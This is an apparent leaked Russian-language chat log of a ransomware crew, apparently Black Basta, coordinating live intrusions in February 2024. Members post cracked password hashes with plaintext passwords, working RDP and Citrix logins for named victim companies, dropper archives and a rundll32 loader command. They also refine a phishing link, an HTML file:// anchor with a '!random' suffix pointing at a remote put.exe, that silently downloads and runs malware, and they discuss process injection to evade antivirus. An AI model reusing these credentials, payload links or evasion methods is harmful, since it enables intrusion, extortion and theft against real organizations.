2024-02-15 19:31:52
@n3auxaxl:matrix.collectionofmanager.space
и потом уже с этим всем
2024-02-15 19:32:06
@n3auxaxl:matrix.collectionofmanager.space
напишу всем этим ребятам, пообщаюсь с ними
2024-02-15 19:32:20
@n3auxaxl:matrix.collectionofmanager.space
распишу это все и мы примем сомвместное решение
2024-02-15 19:32:28
@n3auxaxl:matrix.collectionofmanager.space
как лучше поступить, или план тестов и так далее
2024-02-15 19:35:08
@u123:matrix.bestflowers247.online
и ничего не изменилось
2024-02-15 19:35:22
@n3auxaxl:matrix.collectionofmanager.space
завтра будем что то слать?
2024-02-15 19:35:55
@n3auxaxl:matrix.collectionofmanager.space
я могу на выходных попробовать придумать что слать, а то вижу, что нагрузка JAR херово идет, потому что на тачках нет JAVA
2024-02-15 19:36:23
@n3auxaxl:matrix.collectionofmanager.space
щас по боту с реверсерами разберусь и займусь нагрузкой, чтобы могли неделю хотя бы нормально прослать
2024-02-15 19:36:41
@n3auxaxl:matrix.collectionofmanager.space
чтобы завалило ботов и в работу взяли побольше
2024-02-15 19:55:27
@u123:matrix.bestflowers247.online
и до сих пор
2024-02-15 21:03:07
@usernamenn:matrix.bestflowers247.online
https://www.synacktiv.com/en/publications/gpoddity-exploiting-active-directory-gpos-through-ntlm-relaying-and-more
2024-02-15 21:07:05
@usernamett:matrix.bestflowers247.online
`64.176.219.106:34753 s5`
2024-02-15 23:49:18
@usernamess:matrix.bestflowers247.online
7DNS_x86.bin
2024-02-16 00:22:05
@usernamess:matrix.bestflowers247.online
```
2024-02-16 00:23:52
@usernamess:matrix.bestflowers247.online
GFAD_adm_kekhash.txt
2024-02-16 00:27:32
@username777:matrix.bestflowers247.online
$krb5tgs$23$*SV_Azure$ad.gfad.de$host/sso.gfad.de@ad.gfad.de*$1d99597600d9b806341...df685b9b70:Office365!
2024-02-16 00:29:12
@usernamess:matrix.bestflowers247.online
> <@username777:matrix.bestflowers247.online> $krb5tgs$23$*SV_Azure$ad.gfad.de$host/sso.gfad.de@ad.gfad.de*$1d99597600d9b806341...df685b9b70:Office365!
2024-02-16 00:45:18
@usernamess:matrix.bestflowers247.online
```
2024-02-16 01:03:07
@usernamess:matrix.bestflowers247.online
```
2024-02-16 01:06:06
@username777:matrix.bestflowers247.online
453c12352be2e4d66abe8d05e1a8ce92:gfad9999!
2024-02-16 01:06:14
@usernamess:matrix.bestflowers247.online
> <@username777:matrix.bestflowers247.online> 453c12352be2e4d66abe8d05e1a8ce92:gfad9999!
2024-02-16 01:07:53
@usernamenn:matrix.bestflowers247.online
```
2024-02-16 01:25:05
@username777:matrix.bestflowers247.online
$DCC2$10240#oliver.schaal#57fa6a019629105046cae49a8d6da7bd:Gfad9999!
2024-02-16 01:53:23
@usernamess:matrix.bestflowers247.online
fefba96480002165ea91347556beb322
2024-02-16 02:22:28
@usernamenn:matrix.bestflowers247.online
```
2024-02-16 02:22:59
@usernamenn:matrix.bestflowers247.online
* ```
2024-02-16 03:39:49
@usernamehunter:matrix.bestflowers247.online
0x0200a42ce4d757abde38758e9dec8d9da97514dc41848c0cae861bc8ed86b51a6bf27df3592d78efd3c56e1dd115203ca8edff8ec0c59c54e31aa2aea4a008582d8fc8b5e90b:CHxxrtN&3
2024-02-16 03:46:08
@usernamehunter:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> fefba96480002165ea91347556beb322
2024-02-16 03:50:50
@usernamehunter:matrix.bestflowers247.online
> <@usernamess:matrix.bestflowers247.online> ```
2024-02-16 04:19:51
@usernamehunter:matrix.bestflowers247.online
0x020084c06023af5b8714e77e395001f323eabd7179b2033a0405c92609346a38497044a69a96d05bb6c3e2bf9361a39d5ae92d1be7b663b40730bd73e5a0444e62abfe5e0e5d:gfad9999!
2024-02-16 05:05:43
@usernameboy:matrix.bestflowers247.online
0x0200b743f534cf19c7a4420c9ce57746bf0a461a2b52e8a02e309e7c537d046d6a69ae1a28e2caed8bba0c57af0a58f5aead4edf9275dd02f037ce85a4092478713ce2178cd3:26bmor67
2024-02-16 07:01:54
Black Basta
привет
2024-02-16 07:03:24
Black Basta
> <@n3auxaxl:matrix.collectionofmanager.space> Вот эти 3 пункта скинь ему
2024-02-16 07:03:29
Black Basta
сейчас он оживет сразу
2024-02-16 07:03:32
Black Basta
ёа то скучно отвечал
2024-02-16 07:03:58
Black Basta
> <@n3auxaxl:matrix.collectionofmanager.space> я могу на выходных попробовать придумать что слать, а то вижу, что нагрузка JAR херово идет, потому что на тачках нет JAVA
2024-02-16 07:04:32
Black Basta
> <@n3auxaxl:matrix.collectionofmanager.space> щас по боту с реверсерами разберусь и займусь нагрузкой, чтобы могли неделю хотя бы нормально прослать
2024-02-16 07:04:42
Black Basta
доброе
2024-02-16 07:04:54
Black Basta
доброе
2024-02-16 07:05:20
@usernamett:matrix.bestflowers247.online
Dobroe
2024-02-16 07:05:27
@lapa:matrix.bestflowers247.online
Доброе
2024-02-16 07:05:32
@usernamezz:matrix.bestflowers247.online
ljLj,hjt
2024-02-16 07:05:34
@lapa:matrix.bestflowers247.online
AUTH_FROM_APOLLO_VALID_20240215.txt
2024-02-16 07:05:34
@lapa:matrix.bestflowers247.online
AUTH_VALID_20240215.txt
2024-02-16 07:05:36
Black Basta
https://ne-asa.ghx.com/+CSCOE+/logon.html:testuser1:testuser1
2024-02-16 07:05:38
@usernamezz:matrix.bestflowers247.online
* Доброе)
2024-02-16 07:05:40
Black Basta
по ней какая инфа ?
2024-02-16 07:05:42
@usernameww:matrix.bestflowers247.online
dobroe
2024-02-16 07:06:27
@usernamemm:matrix.bestflowers247.online
доброе
2024-02-16 07:06:43
@usernamemm:matrix.bestflowers247.online
вроде J
2024-02-16 07:06:47
@usernamemm:matrix.bestflowers247.online
щас позову
2024-02-16 07:07:16
Black Basta
SMTP1502.txt
2024-02-16 07:07:17
Black Basta
IMAP1502.txt
2024-02-16 07:07:30
Black Basta
AUTH_FROM_APOLLO_VALID_20240215.txt
2024-02-16 07:07:33
Black Basta
AUTH_VALID_20240215.txt
2024-02-16 07:08:26
@lapa:matrix.bestflowers247.online
+
2024-02-16 07:08:29
@lapa:matrix.bestflowers247.online
есть впски?
2024-02-16 07:08:36
@lapa:matrix.bestflowers247.online
а то что-то вчрешние уже не работают
2024-02-16 07:10:38
@lapa:matrix.bestflowers247.online
странно
2024-02-16 07:10:38
@lapa:matrix.bestflowers247.online
!proxychains ssh root@23.227.193.23 = webbloper.com +
2024-02-16 07:10:43
@lapa:matrix.bestflowers247.online
я их не юзал вчера
2024-02-16 07:10:46
@lapa:matrix.bestflowers247.online
но не работают
2024-02-16 07:38:22
@usernamejj:matrix.bestflowers247.online
```
2024-02-16 07:40:43
Black Basta
да
2024-02-16 07:40:44
Black Basta
есть
2024-02-16 07:41:08
Black Basta
```
2024-02-16 07:41:29
Black Basta
> <@lapa:matrix.bestflowers247.online> !proxychains ssh root@23.227.193.23 = webbloper.com +
2024-02-16 07:41:44
Black Basta
[23:21:02] LORD1 - Cob Meta: I said you must run it from Core Impact!
2024-02-16 07:42:43
Black Basta
Снимок экрана 2024-02-15 в 23.42.32.png
2024-02-16 07:45:35
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> sent an image.
2024-02-16 07:45:46
@lapa:matrix.bestflowers247.online
он как раз и запускал на core impact
2024-02-16 08:08:02
@lapa:matrix.bestflowers247.online
emiindustries.com 217.79.249.130:443 emiindustries\aharvill ah121162
2024-02-16 08:08:13
@lapa:matrix.bestflowers247.online
по ситриксу валидный доступ
2024-02-16 08:08:42
@lapa:matrix.bestflowers247.online
запустил сейчас, посмотрим сколько с мыла и пасса будет
2024-02-16 08:09:12
Black Basta
забанили вакк от впс
2024-02-16 08:09:25
@usernamett:matrix.bestflowers247.online
```
2024-02-16 08:09:32
@lapa:matrix.bestflowers247.online
+
2024-02-16 08:09:43
Black Basta
emiindustries.com 217.79.249.130:443 emiindustries\aharvill ah121162
2024-02-16 08:09:59
Black Basta
```
2024-02-16 08:10:02
@lapa:matrix.bestflowers247.online
+
2024-02-16 08:10:15
@usernamemm:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> `$DCC2$10240#admin_jaughenbaugh#afd2d90b42b94e442b663fa3524e9dfa`
2024-02-16 08:10:21
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> emiindustries.com 217.79.249.130:443 emiindustries\aharvill ah121162
2024-02-16 08:11:24
@usernamemm:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> `$DCC2$10240#admin_cbarnett#566f3bb4720250a33e68e0315d226087`
2024-02-16 08:11:51
@usernamemm:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> `$DCC2$10240#CbarnettAdmin#5921081abfed18023f15168b3f5928d3`
2024-02-16 08:12:04
@usernamemm:matrix.bestflowers247.online
gпо этим путо?
2024-02-16 08:17:56
@lapa:matrix.bestflowers247.online
https://powerglobalstore.com/xhA/{random}
2024-02-16 08:19:11
Black Basta
[23:48:16] AA: I'm running core impact.
2024-02-16 08:19:52
Black Basta
Снимок экрана 2024-02-15 в 23.42.32.png
2024-02-16 08:19:56
Black Basta
[23:48:16] AA: I'm running core impact.
2024-02-16 08:20:05
Black Basta
и билды нужны
2024-02-16 08:21:01
@lapa:matrix.bestflowers247.online
ну мелкор же проверял Core Impact... у него не пашет
2024-02-16 08:21:24
Black Basta
Снимок экрана 2024-02-16 в 00.21.08.png
2024-02-16 08:21:26
@lapa:matrix.bestflowers247.online
т.е. там сбрас пасса врядли будет работать
2024-02-16 08:21:28
@lapa:matrix.bestflowers247.online
потому что там нужен ключ
2024-02-16 08:22:03
@lapa:matrix.bestflowers247.online
ну со вчерашних экселей что-то взяли в работу?
2024-02-16 08:22:07
@usernamehunter:matrix.bestflowers247.online
> <@usernamemm:matrix.bestflowers247.online> gпо этим путо?
2024-02-16 08:22:13
@usernamemm:matrix.bestflowers247.online
* по этим пуcто?
2024-02-16 08:22:14
@lapa:matrix.bestflowers247.online
или нет смысла их слать?
2024-02-16 08:22:34
@usernamemm:matrix.bestflowers247.online
> <@usernamehunter:matrix.bestflowers247.online> у меня пока по 0
2024-02-16 08:22:39
Black Basta
> <@lapa:matrix.bestflowers247.online> ну со вчерашних экселей что-то взяли в работу?
2024-02-16 08:22:52
@lapa:matrix.bestflowers247.online
+
2024-02-16 08:23:22
@lapa:matrix.bestflowers247.online
ну и вы проверяли все же этот эксель, там не работает на сетках он
2024-02-16 08:23:30
@lapa:matrix.bestflowers247.online
плюс у меня он аж 4 клика заставляет делать
2024-02-16 08:23:37
@lapa:matrix.bestflowers247.online
такое себе
2024-02-16 08:25:16
Black Basta
да
2024-02-16 08:37:37
@n3auxaxl:matrix.collectionofmanager.space
Привет, ащшс сделаю
2024-02-16 08:39:30
@n3auxaxl:matrix.collectionofmanager.space
* Привет, щас сделаю
2024-02-16 09:43:28
@u123:matrix.bestflowers247.online
и до сих пор
2024-02-16 09:50:53
@n3auxaxl:matrix.collectionofmanager.space
PASS: 637ba52945b2463c0cc65f97421f8295
2024-02-16 09:50:56
@n3auxaxl:matrix.collectionofmanager.space
dropper_GG21_F_D_f0adda360d2b4ccda11468e026526576_1rLq71f.zip
2024-02-16 09:51:00
Black Basta
patriziapepe.com_privat
2024-02-16 09:51:04
Black Basta
новая сетка у тебя
2024-02-16 09:51:13
@n3auxaxl:matrix.collectionofmanager.space
https://4c5kb5ly.cofoundermanagerplatform.online/7e6375fd-0860-4a88-8d60-7beac46dd708/bot/33726
2024-02-16 09:51:22
@n3auxaxl:matrix.collectionofmanager.space
вот я купил RDP
2024-02-16 09:51:32
@n3auxaxl:matrix.collectionofmanager.space
это сетка, может быть что то нормальное
2024-02-16 09:51:42
@n3auxaxl:matrix.collectionofmanager.space
просто хоститься в PK
2024-02-16 09:58:00
Black Basta
сейчас
2024-02-16 09:58:12
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-16 10:02:18
@muaddib6:matrix.org
ok
2024-02-16 10:05:57
@n3auxaxl:matrix.collectionofmanager.space
надо было через Create REmoteThread
2024-02-16 10:05:59
@n3auxaxl:matrix.collectionofmanager.space
дететк словили
2024-02-16 10:06:02
@n3auxaxl:matrix.collectionofmanager.space
от каспера
2024-02-16 10:06:05
@n3auxaxl:matrix.collectionofmanager.space
щас еще раз позову его в боту
2024-02-16 10:06:15
@n3auxaxl:matrix.collectionofmanager.space
и сделайте через CreateRemoteTrhead
2024-02-16 10:07:03
@n3auxaxl:matrix.collectionofmanager.space
заново зову
2024-02-16 10:07:32
Black Basta
ага
2024-02-16 10:07:34
Black Basta
зову
2024-02-16 10:07:37
Black Basta
CreateRemoteTrhead
2024-02-16 10:07:45
@n3auxaxl:matrix.collectionofmanager.space
да
2024-02-16 10:07:45
Black Basta
но он офф
2024-02-16 10:07:49
@n3auxaxl:matrix.collectionofmanager.space
щас я позову бота
2024-02-16 10:07:50
@n3auxaxl:matrix.collectionofmanager.space
через RDP
2024-02-16 10:07:54
Black Basta
++
2024-02-16 10:07:56
@n3auxaxl:matrix.collectionofmanager.space
а то он ужеш в офф
2024-02-16 10:07:57
@n3auxaxl:matrix.collectionofmanager.space
спалилось все
2024-02-16 10:08:02
Black Basta
дай рдп я сам зайду туда
2024-02-16 10:08:12
@n3auxaxl:matrix.collectionofmanager.space
124.109.36.125:33899;PG\PG;pg123
2024-02-16 10:08:18
@n3auxaxl:matrix.collectionofmanager.space
вот
2024-02-16 10:08:19
@n3auxaxl:matrix.collectionofmanager.space
заходи
2024-02-16 10:08:48
Black Basta
124.109.36.125:33899;PG\PG;pg123
2024-02-16 10:08:56
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> 124.109.36.125:33899;PG\PG;pg123
2024-02-16 10:10:01
Black Basta
ты с реверсерами разобрался а то вчера ipiku засыпало
2024-02-16 10:10:16
@n3auxaxl:matrix.collectionofmanager.space
да
2024-02-16 10:10:26
@n3auxaxl:matrix.collectionofmanager.space
сегодня доразберусь еще
2024-02-16 10:10:29
@n3auxaxl:matrix.collectionofmanager.space
и все
2024-02-16 10:10:32
Black Basta
что там за резьбу сорвало вчера
2024-02-16 10:10:38
@n3auxaxl:matrix.collectionofmanager.space
завтра уже буду заниматься нагрузкой
2024-02-16 10:10:41
@n3auxaxl:matrix.collectionofmanager.space
что слать будем
2024-02-16 10:10:47
Black Basta
амеру что пишем ?
2024-02-16 10:10:53
Black Basta
по счет сплойта
2024-02-16 10:11:13
@n3auxaxl:matrix.collectionofmanager.space
> <@usernamegg:matrix.bestflowers247.online> амеру что пишем ?
2024-02-16 10:11:18
@n3auxaxl:matrix.collectionofmanager.space
все настроою и еще раз попробую
2024-02-16 10:11:22
@n3auxaxl:matrix.collectionofmanager.space
и посмотрим что будет
2024-02-16 10:11:31
Black Basta
Снимок экрана 2024-02-16 в 13.11.15.png
2024-02-16 10:11:32
Black Basta
[23:49:23] LORD1 - Cob Meta: So the problem is with your target then. The exploit is certainly working from Core Impact. It comes directly from the company just as all the other exploits there.
2024-02-16 10:11:34
@n3auxaxl:matrix.collectionofmanager.space
но я сомневаюсь что результат поменяется
2024-02-16 10:11:36
@n3auxaxl:matrix.collectionofmanager.space
но попробовать стоит
2024-02-16 10:11:54
@n3auxaxl:matrix.collectionofmanager.space
> <@usernamegg:matrix.bestflowers247.online> [23:49:23] LORD1 - Cob Meta: So the problem is with your target then. The exploit is certainly working from Core Impact. It comes directly from the company just as all the other exploits there.
2024-02-16 10:12:10
Black Basta
Снимок экрана 2024-02-16 в 13.11.58.png
2024-02-16 10:19:03
@lapa:matrix.bestflowers247.online
+
2024-02-16 10:19:36
@lapa:matrix.bestflowers247.online
но я вот сейчас выкачку почти сделал
2024-02-16 10:19:39
@lapa:matrix.bestflowers247.online
выборочно смотрю
2024-02-16 10:19:44
@lapa:matrix.bestflowers247.online
письмо вообще не очень
2024-02-16 10:19:50
@lapa:matrix.bestflowers247.online
* письма вообще не очень
2024-02-16 10:24:22
@lapa:matrix.bestflowers247.online
мало что-то писем пока короч
2024-02-16 10:25:12
Black Basta
да
2024-02-16 10:25:16
Black Basta
ну все ранвно сделать надо
2024-02-16 10:27:00
@usernameww:matrix.bestflowers247.online
`KrisAdmin:$DCC2$10240#KrisAdmin#e3005cf2f521a18a8fc0e9343591fbcc`
2024-02-16 10:38:14
Black Basta
Снимок экрана 2024-02-16 в 13.38.03.png
2024-02-16 10:40:00
@lapa:matrix.bestflowers247.online
да, на сетках в первую очередь нужно будет проверять каб этот
2024-02-16 10:40:54
Black Basta
Снимок экрана 2024-02-16 в 13.40.37.png
2024-02-16 10:40:54
Black Basta
ага
2024-02-16 10:41:00
Black Basta
проверим
2024-02-16 10:41:28
@lapa:matrix.bestflowers247.online
ну короч с вп я вот поставил на выкачку
2024-02-16 10:41:32
@lapa:matrix.bestflowers247.online
херня
2024-02-16 10:41:40
@lapa:matrix.bestflowers247.online
там нет норм писем
2024-02-16 10:41:49
@lapa:matrix.bestflowers247.online
ну, переписки прям
2024-02-16 10:41:52
@lapa:matrix.bestflowers247.online
спам какой-то один
2024-02-16 10:41:55
Black Basta
PK | 124.109.36.125
2024-02-16 10:41:56
Black Basta
мелкая
2024-02-16 10:41:59
@lapa:matrix.bestflowers247.online
все равно чуть чекается конечно
2024-02-16 10:42:08
@lapa:matrix.bestflowers247.online
но уже вижу, что не то, что нам нужно
2024-02-16 10:42:10
@usernamejj:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> 124.109.36.125:33899;PG\PG;pg123
2024-02-16 10:42:25
Black Basta
ну надо что бы всеь объем отчекался
2024-02-16 10:42:31
Black Basta
и уже потмо ставить на выкачку
2024-02-16 10:42:38
Black Basta
<5M, pyramidsglobal.com
2024-02-16 10:44:00
@lapa:matrix.bestflowers247.online
CIT_AUTH_VALID.txt
2024-02-16 10:44:06
@lapa:matrix.bestflowers247.online
вот ситриксы буду сбрасывать
2024-02-16 10:44:08
@lapa:matrix.bestflowers247.online
вроде валидные
2024-02-16 10:44:17
@lapa:matrix.bestflowers247.online
там еще у них несколько версий авторизации есть
2024-02-16 10:44:21
@lapa:matrix.bestflowers247.online
пока только одну версию чекаю
2024-02-16 10:44:26
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-16 10:44:34
@burito:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> PASS: 637ba52945b2463c0cc65f97421f8295
2024-02-16 10:44:34
@burito:matrix.bestflowers247.online
drps.7z
2024-02-16 10:44:36
@lapa:matrix.bestflowers247.online
потому что со второй у меня ложно считало валидной
2024-02-16 10:44:49
@n3auxaxl:matrix.collectionofmanager.space
+++
2024-02-16 10:44:55
@lapa:matrix.bestflowers247.online
нужно еще доработать и подумать, как проверить эту ложну авторизаци
2024-02-16 10:44:59
@lapa:matrix.bestflowers247.online
* нужно еще доработать и подумать, как проверить эту ложну авторизацию
2024-02-16 10:45:09
@n3auxaxl:matrix.collectionofmanager.space
щас
2024-02-16 10:53:23
@n3auxaxl:matrix.collectionofmanager.space
Screenshot_2024-02-16_13-01-59.png
2024-02-16 10:53:25
@n3auxaxl:matrix.collectionofmanager.space
xbcnj
2024-02-16 10:53:26
@n3auxaxl:matrix.collectionofmanager.space
dct pfgecnbkjcm
2024-02-16 10:53:29
@n3auxaxl:matrix.collectionofmanager.space
чисто все запустилось
2024-02-16 10:53:36
@n3auxaxl:matrix.collectionofmanager.space
но ошибка
2024-02-16 10:53:57
@usernamess:matrix.bestflowers247.online
`https://www.securitylab.ru/news/546060.php`
2024-02-16 10:54:03
@burito:matrix.bestflowers247.online
бл щас
2024-02-16 10:54:08
@n3auxaxl:matrix.collectionofmanager.space
на втором тоже
2024-02-16 10:56:40
Black Basta
смотри
2024-02-16 10:56:40
Black Basta
https://www.securitylab.ru/news/546060.php
2024-02-16 10:56:44
Black Basta
<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>
2024-02-16 10:56:58
Black Basta
* <a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>
2024-02-16 10:57:11
Black Basta
* `<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>`
2024-02-16 10:57:28
Black Basta
ебать
2024-02-16 10:57:28
Black Basta
https://www.securitylab.ru/news/546060.php
2024-02-16 10:57:31
Black Basta
ебать
2024-02-16 10:57:36
Black Basta
надо пробовать
2024-02-16 10:58:48
@n3auxaxl:matrix.collectionofmanager.space
ого
2024-02-16 10:58:49
@n3auxaxl:matrix.collectionofmanager.space
ахуеть
2024-02-16 10:59:29
@lapa:matrix.bestflowers247.online
+
2024-02-16 11:01:43
@lapa:matrix.bestflowers247.online
нужно у привата спросить
2024-02-16 11:01:51
@lapa:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> `<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>`
2024-02-16 11:01:53
@lapa:matrix.bestflowers247.online
какую ссылку
2024-02-16 11:06:50
Black Basta
```
2024-02-16 11:08:08
@n3auxaxl:matrix.collectionofmanager.space
Щас пример скину
2024-02-16 11:08:10
@lapa:matrix.bestflowers247.online
он просто уже такие линки делал
2024-02-16 11:08:49
@n3auxaxl:matrix.collectionofmanager.space
<a href="file:///\\ip_address_of_ftp\path_to_file.msi!random_String">LOL</a>
2024-02-16 11:09:00
@n3auxaxl:matrix.collectionofmanager.space
```
2024-02-16 11:09:06
@n3auxaxl:matrix.collectionofmanager.space
вот смотри
2024-02-16 11:09:11
@n3auxaxl:matrix.collectionofmanager.space
ссылка на файл с разрешением
2024-02-16 11:09:15
@n3auxaxl:matrix.collectionofmanager.space
.msi допустим
2024-02-16 11:09:18
@n3auxaxl:matrix.collectionofmanager.space
или .exe к примеру
2024-02-16 11:09:26
@n3auxaxl:matrix.collectionofmanager.space
дальше рандомная строка и все
2024-02-16 11:09:30
@n3auxaxl:matrix.collectionofmanager.space
и когда тип нажимает на ссылку
2024-02-16 11:09:34
@n3auxaxl:matrix.collectionofmanager.space
у него сразу скачивается файл
2024-02-16 11:09:36
@n3auxaxl:matrix.collectionofmanager.space
и открывается
2024-02-16 11:09:42
@n3auxaxl:matrix.collectionofmanager.space
и никто даже не увидит
2024-02-16 11:09:50
@n3auxaxl:matrix.collectionofmanager.space
он типо в бекграунде делается
2024-02-16 11:09:52
@n3auxaxl:matrix.collectionofmanager.space
аухеть
2024-02-16 11:13:43
@lapa:matrix.bestflowers247.online
ну в примере тут rtf файл
2024-02-16 11:13:50
@lapa:matrix.bestflowers247.online
ща попробую на линк залить
2024-02-16 11:17:00
@burito:matrix.bestflowers247.online
drps.7z
2024-02-16 11:17:16
@burito:matrix.bestflowers247.online
строка dfshgfghjhfdnmhnbgfdgnnghdgfnjhgdfgbhgfdnngd
2024-02-16 11:20:35
@n3auxaxl:matrix.collectionofmanager.space
чисто, стучит
2024-02-16 11:21:18
@burito:matrix.bestflowers247.online
> <@n3auxaxl:matrix.collectionofmanager.space> чисто, стучит
2024-02-16 11:23:19
@n3auxaxl:matrix.collectionofmanager.space
только лучше так делать по идее
2024-02-16 11:23:27
@n3auxaxl:matrix.collectionofmanager.space
<a href="file:///ip_address_of_ftp\path_to_file.msi!random_String">LOL</a>
2024-02-16 11:23:29
@n3auxaxl:matrix.collectionofmanager.space
ой
2024-02-16 11:23:35
@n3auxaxl:matrix.collectionofmanager.space
```
2024-02-16 11:23:52
@n3auxaxl:matrix.collectionofmanager.space
ну кароче после file:/// идет ссылка на файл
2024-02-16 11:24:01
Black Basta
```
2024-02-16 11:24:23
Black Basta
вот смотри
2024-02-16 11:24:35
@lapa:matrix.bestflowers247.online
+
2024-02-16 11:24:43
Black Basta
только лучше так делать по идее
2024-02-16 11:24:43
@lapa:matrix.bestflowers247.online
ну вот сейчас попробую rtf файлик так сделать
2024-02-16 11:24:46
@lapa:matrix.bestflowers247.online
или даже путти
2024-02-16 11:24:51
Black Basta
```
2024-02-16 11:24:57
Black Basta
ну кароче после file:/// идет ссылка на файл
2024-02-16 11:25:07
@lapa:matrix.bestflowers247.online
+
2024-02-16 11:25:14
Black Basta
ну вот сейчас попробую rtf файлик так сделать
2024-02-16 11:25:27
@n3auxaxl:matrix.collectionofmanager.space
помнишь у darkgate я тебе недавно скидывал
2024-02-16 11:25:27
@n3auxaxl:matrix.collectionofmanager.space
.url
2024-02-16 11:25:32
Black Basta
drps.7z
2024-02-16 11:25:36
@n3auxaxl:matrix.collectionofmanager.space
```
2024-02-16 11:25:36
Black Basta
строка dfshgfghjhfdnmhnbgfdgnnghdgfnjhgdfgbhgfdnngd
2024-02-16 11:25:39
Black Basta
ЧИСТО
2024-02-16 11:25:41
@n3auxaxl:matrix.collectionofmanager.space
вот так у них было
2024-02-16 11:25:45
Black Basta
МЕЛКОР ПРОВЕРИЛ
2024-02-16 11:25:52
@n3auxaxl:matrix.collectionofmanager.space
толкьо спосле .msi надо ставить !random_string
2024-02-16 11:25:56
@n3auxaxl:matrix.collectionofmanager.space
и получиться
2024-02-16 11:26:11
@n3auxaxl:matrix.collectionofmanager.space
```
2024-02-16 11:26:24
Black Basta
Снимок экрана 2024-02-16 в 14.26.18.png
2024-02-16 11:26:24
@lapa:matrix.bestflowers247.online
+
2024-02-16 11:27:29
Black Basta
++
2024-02-16 11:27:58
@lapa:matrix.bestflowers247.online
я пока с путти проверю
2024-02-16 11:28:01
@lapa:matrix.bestflowers247.online
будет ли работать
2024-02-16 11:28:08
@lapa:matrix.bestflowers247.online
на через аутлук
2024-02-16 11:33:05
Black Basta
++
2024-02-16 11:34:14
@burito:matrix.bestflowers247.online
7DNS_x86.zip
2024-02-16 11:35:01
@burito:matrix.bestflowers247.online
rundll32.exe dll.dll,ReloadImage
2024-02-16 11:38:39
@lapa:matrix.bestflowers247.online
нужно новый сервер взять для соксов
2024-02-16 11:38:53
@lapa:matrix.bestflowers247.online
http://95.216.29.185/0d650fb25643341d34db235021539c1c/index.php?pass=adm443
2024-02-16 11:38:59
@lapa:matrix.bestflowers247.online
а то сюда фигня налетела всякая
2024-02-16 11:39:12
@lapa:matrix.bestflowers247.online
и сейчас вот что-то отправить ничего не могу нормально
2024-02-16 11:40:25
@usernamess:matrix.bestflowers247.online
```
2024-02-16 11:41:31
Black Basta
сейчас
2024-02-16 11:42:50
@usernamess:matrix.bestflowers247.online
Tr1nsp2rt
2024-02-16 11:43:00
@lapa:matrix.bestflowers247.online
http://temp.sh/YBJEU/Capture19.PNG
2024-02-16 11:43:17
@username777:matrix.bestflowers247.online
0x0200e032e44f56bccbba2ab4df13cb4f360b980b39ee1d8f332aecf10f9c7e017998428422706f9854503f39e4195a6475c90328f60e0e99f18a19bf6153b91f05a1fb2d7f3e:Tr1nsp2rt
2024-02-16 11:44:02
@lapa:matrix.bestflowers247.online
http://temp.sh/fIzhZ/Capture20.PNG
2024-02-16 11:44:07
@lapa:matrix.bestflowers247.online
пока что-то не получилось
2024-02-16 11:44:16
@lapa:matrix.bestflowers247.online
возможно не так вставил линк
2024-02-16 11:44:35
@lapa:matrix.bestflowers247.online
спросите у привата
2024-02-16 11:45:05
@lapa:matrix.bestflowers247.online
185.113.8.216\put.exe вот линк
2024-02-16 11:45:16
@lapa:matrix.bestflowers247.online
какой именно в письме a тег слать
2024-02-16 11:45:59
Black Basta
http://temp.sh/YBJEU/Capture19.PNG
2024-02-16 11:46:14
Black Basta
185.113.8.216\put.exe вот линк
2024-02-16 11:49:43
@lapa:matrix.bestflowers247.online
http://185.113.8.216/put.exe ну вот линк
2024-02-16 11:49:44
@n3auxaxl:matrix.collectionofmanager.space
sek
2024-02-16 11:50:04
Black Basta
`https://heip.hmm21.com/Citrix/PCTXWeb/:hmm500056:hmm21.com`
2024-02-16 11:50:17
Black Basta
https://www.zoominfo.com/c/hyundai-merchant-marine/58017934
2024-02-16 11:50:23
@n3auxaxl:matrix.collectionofmanager.space
yt
2024-02-16 11:50:26
@lapa:matrix.bestflowers247.online
https://outlook.office.com/local/path/file:///185.113.8.216/put.exe в письме кстате аутлук оборачивание вот так
2024-02-16 11:50:27
@n3auxaxl:matrix.collectionofmanager.space
а ну скинь
2024-02-16 11:50:31
@n3auxaxl:matrix.collectionofmanager.space
как у вас линк
2024-02-16 11:50:33
@n3auxaxl:matrix.collectionofmanager.space
неправлиьно
2024-02-16 11:50:36
@n3auxaxl:matrix.collectionofmanager.space
что то у вас
2024-02-16 11:51:12
Black Basta
185.113.8.216\put.exe вот линк
2024-02-16 11:53:46
@n3auxaxl:matrix.collectionofmanager.space
а там нельзя просто линк на файл указать?
2024-02-16 11:54:04
@n3auxaxl:matrix.collectionofmanager.space
file://185.113.8.216/put.exe!random
2024-02-16 11:54:07
@n3auxaxl:matrix.collectionofmanager.space
вот так
2024-02-16 11:54:18
@n3auxaxl:matrix.collectionofmanager.space
аааа
2024-02-16 11:54:21
@n3auxaxl:matrix.collectionofmanager.space
у вас там 3
2024-02-16 11:54:33
@n3auxaxl:matrix.collectionofmanager.space
3 слеша
2024-02-16 11:54:37
@n3auxaxl:matrix.collectionofmanager.space
после фйайла
2024-02-16 11:54:38
@n3auxaxl:matrix.collectionofmanager.space
надо 2
2024-02-16 11:54:42
Black Basta
а там нельзя просто линк на файл указать?
2024-02-16 11:55:10
@ssd:matrix.bestflowers247.online
ok
2024-02-16 11:55:22
@lapa:matrix.bestflowers247.online
вот сейчас попробую
2024-02-16 11:55:31
Black Basta
сек
2024-02-16 11:56:31
@usernamezz:matrix.bestflowers247.online
> <@usernamegg:matrix.bestflowers247.online> `https://heip.hmm21.com/Citrix/PCTXWeb/:hmm500056:hmm21.com`
2024-02-16 11:56:48
@lapa:matrix.bestflowers247.online
